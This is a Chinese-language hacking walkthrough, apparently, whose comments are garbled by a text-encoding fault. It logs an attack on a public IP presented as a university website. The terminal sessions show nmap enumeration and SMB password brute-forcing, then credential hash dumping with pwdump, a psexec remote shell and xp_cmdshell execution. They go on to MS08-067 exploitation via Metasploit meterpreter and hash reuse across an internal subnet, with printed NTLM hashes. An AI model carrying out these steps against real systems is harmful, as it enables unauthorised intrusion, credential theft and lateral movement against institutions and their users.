nmap+msfÈëÇÖ¹ãÎ÷ʦ·¶
¹ãÎ÷ʦ·¶ÍøÕ¾http://202.103.242.241/root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcpopenmstask Microsoft mstask (task server ¨C c:\winnt\system32\Mstask.exe)
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-dsMicrosoft Windows 2000 microsoft-ds
1025/tcp openmstask Microsoft mstask (task server ¨C c:\winnt\system32\Mstask.exe)
1026/tcp openmsrpc Microsoft Windows RPC
3372/tcp openmsdtc?
3389/tcp openms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,¡±hO\n\x000Z¡±)%r(RTSPRequest,6,¡±hO\n\x000Z¡±)%r(HTTPOptions
SF:,6,¡±hO\n\x000Z¡±)%r(Help,6,¡±hO\n\x000Z¡±)%r(SSLSessionReq,6,¡±hO\n\x000Z¡±)
SF:%r(FourOhFourRequest,6,¡±hO\n\x000Z¡±)%r(LPDString,6,¡±hO\n\x000Z¡±)%r(SIPO
SF:ptions,6,¡±hO\n\x000Z¡±);
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb//ÁгöɨÃè½Å±¾
-rw-r¨Cr¨C 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r¨Cr¨C 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r¨Cr¨C 1 root root4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r¨Cr¨C 1 root root3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r¨Cr¨C 1 root root7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r¨Cr¨C 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r¨Cr¨C 1 root root6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r¨Cr¨C 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r¨Cr¨C 1 root root1658 2011-07-09 07:36 smb-flood.nse
-rw-r¨Cr¨C 1 root root2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r¨Cr¨C 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r¨Cr¨C 1 root root4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r¨Cr¨C 1 root root2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r¨Cr¨C 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r¨Cr¨C 1 root root1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap ¨Cscript=smb-enum-users.nse 202.103.242.241
//´ËÄËʹÓýű¾É¨ÃèÔ¶³Ì»úÆ÷Ëù´æÔÚµÄÕË»§Ãû
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
1025/tcp openNFS-or-IIS
1026/tcp openLSA-or-nterm
3372/tcp openmsdtc
3389/tcp openms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //ɨÃè½á¹û
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap ¨Cscript=smb-enum-shares.nse 202.103.242.241
//²é¿´¹²Ïí
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
1025/tcp openNFS-or-IIS
1026/tcp openLSA-or-nterm
3372/tcp openmsdtc
3389/tcp openms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap ¨Cscript=smb-brute.nse 202.103.242.241
//»ñÈ¡Óû§ÃÜÂë
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
1025/tcp openNFS-or-IIS
1026/tcp openLSA-or-nterm
3372/tcp openmsdtc
3389/tcp openms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
administrator:<blank> => Login was successful
|_test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2//×¥hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap ¨Cscript=smb-pwdump.nse ¨Cscript-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp openmsrpc
139/tcp opennetbios-ssn
445/tcp openmicrosoft-ds
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\×ÀÃæ>psexec.exe \\202.103.242.241-u test //»ñÈ¡Ò»¸öcmdshell
-p 123456 -e cmd.exe
PsExec v1.55 ¨C Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals ¨C www.sysinternals.com
Microsoft Windows 2000
(C) °æȨËùÓÐ 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter ±¾µØÁ¬½Ó:
Connection-specific DNS Suffix. :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\×ÀÃæ\osql>osql.exe -S 202.103.242.241 -U sa -P ¡°123456¡å -Q ¡°exec master..xp_cmdshell £§net user£§ ¡° //Ô¶³ÌµÇ¼saÖ´ÐÐÃüÁî
root@bt:/usr/local/share/nmap/scripts# nmap ¨Cscript=smb-check-vulns.nse 202.103.242.241 //¼ì²âÄ¿±ê»úÆ÷©¶´
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
1025/tcp openNFS-or-IIS
1026/tcp openLSA-or-nterm
3372/tcp openmsdtc
3389/tcp openms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole //ÔÚmsfÉÏÀûÓÃms08-067©¶´¶ÔÄ¿±ê»úÆ÷½øÐÐÒç³ö
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msfexploit(ms08_067_netapi) > show options
msfexploit(ms08_067_netapi) > set RHOST 202.103.242.241
msfexploit(ms08_067_netapi) > show payloads
msfexploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msfexploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? (ctrl+z)
msfexploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap ¨Cscript=smb-brute.nse ¨Cscript-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//ÀûÓÃÓû§Ãû¸ú»ñÈ¡µÄhash³¢ÊÔ¶ÔÕû¶ÎÄÚÍø½øÐеǼ
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcpopenmsrpc
139/tcpopennetbios-ssn
445/tcpopenmicrosoft-ds
1025/tcp openNFS-or-IIS
1026/tcp openLSA-or-nterm
3372/tcp openmsdtc
3389/tcp openms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_administrator:<blank> => Login was successful
¹¥»÷³É¹¦£¬Ò»¸ö¼òµ¥µÄmsf+nmap¹¥»÷~~¡¤
Ò³:
[1]